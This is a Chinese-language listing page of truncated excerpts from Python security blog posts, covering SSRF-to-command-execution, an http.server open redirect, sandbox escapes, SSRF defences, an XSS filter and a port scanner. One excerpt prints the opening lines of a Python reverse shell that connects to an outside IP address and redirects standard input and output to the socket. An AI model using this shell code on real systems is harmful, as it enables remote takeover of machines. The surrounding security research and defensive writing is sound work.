51工具盒子
Python安全 - 从SSRF到命令执行惨案
前两天遇到的一个问题,起源是在某个数据包里看到`url=`这个关键字,当时第一想到会不会有SSRF漏洞。 以前乌云上有很多从SSRF打到内网并执行命令的案例,比如有通过SSRF+S2-016漏洞漫游内网的案例,十分经典。不过当时拿到这个目标,我只是想确认一下他是不是SSRF漏洞,没想到后面找到了很多有趣的东西。截图不多(有的是后面补得),大家凑合看吧。 [0x01 判断SS...
最新发布
python http.server open redirect vulnerability
<p>Github账号被封了以后,Vulhub也无法继续更新了,余下很多时间,默默看了点代码,偶然还能遇上一两个漏洞,甚是有趣。</p> <p>这个漏洞出现在python核心库http中,发送给官方团队后被告知撞洞了,且官方也认为需要更多人看看怎么修复这个问题,所以我们来分析一下。</p> <h2><a href...
Code-Breaking中的两个Python沙箱
<p>这是发表在跳跳糖上的文章<a href="https://www.tttang.com/archive/1294/">https://www.tttang.com/archive/1294/</a>,如需转载,请联系跳跳糖。</p> <p>这是一篇Code-Breaking 2018鸽了半年的...
谈一谈如何在Python开发中拒绝SSRF漏洞
<h2><a href="#0x01-ssrf">0x01 SSRF漏洞常见防御手法及绕过方法</a> {#0x01-ssrf}</h2> <p>SSRF是一种常见的Web漏洞,通常存在于需要请求外部内容的逻辑中,比如本地化网络图片、XML解析时的外部实体注入、软件的离线下载等。当攻击者传入一个未经...
掌阅iReader某站Python漏洞挖掘
<p>Python作为新一代的web开发语言,不少互联网公司内外网使用其开发站点。Python web周边还存在redis、memcached、mongod、supervisord等等服务,我们结合这些服务的一系列安全问题,将可以做很多有趣的事情。</p> <p>目标端口开放了 6379、8080~8086、8889、8079</p&g...
python富文本XSS过滤器
前言:那天我正在开发网站最关键的部分------XSS过滤器,女神突然来电话说:"那东西好难呀,别开发了,来我家玩吧!"。我"啪"地一下把电话挂了,想让我的网站出XSS漏洞,没门\~ python做web开发当今已经逐渐成为主流之一,但相关的一些第三方模块和库还没有php和node.js多。 比如XSS过滤组件,PHP下有著名的&qu...
python编写断点续传下载软件
一年一度的python小程序编写系列之------断点续传下载软件。 [一、HTTP断点续传原理](#http) {#http} ----------------------------- 其实HTTP断点续传原理比较简单,在HTTP数据包中,可以增加Range头,这个头以字节为单位指定请求的范围,来下载范围内的字节流。如: [![QQ20150223-1@2x.png]...
python 实现 php 的 var_dump 功能
<p>最近在做python的web开发(原谅我的多变,好东西总想都学着。。。node.js也是),不过过程中总遇到些问题,不管是web.py还是django,开发起来确实没用php方便,毕竟存在的时间比较短,很多不完善的地方。</p> <p>比如我在调试php中最常用的函数,var_dump,在python里找不到合适的替代函数。php中va...
python正向连接后门
python在linux下的反弹shell代码我相信很多人都见过: ``` import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("59.188.234.64",14575)) os.dup2(s.fileno(),0) os.du...
Python多线程端口扫描工具
<p>昨晚今晚写了两晚,总算把Py Port Scanner 写完了,姑且称之为0.1版本,算是一个Python多线程端口扫描工具。</p> <p>水平有限,实话中间有一些困惑和不解的地方,代码可能也写的比较乱。有些问题并未找到很好的解决方法,还望大家谅解。速度大家自己试验,我感觉还行。</p> <p>送上效果图两份,...
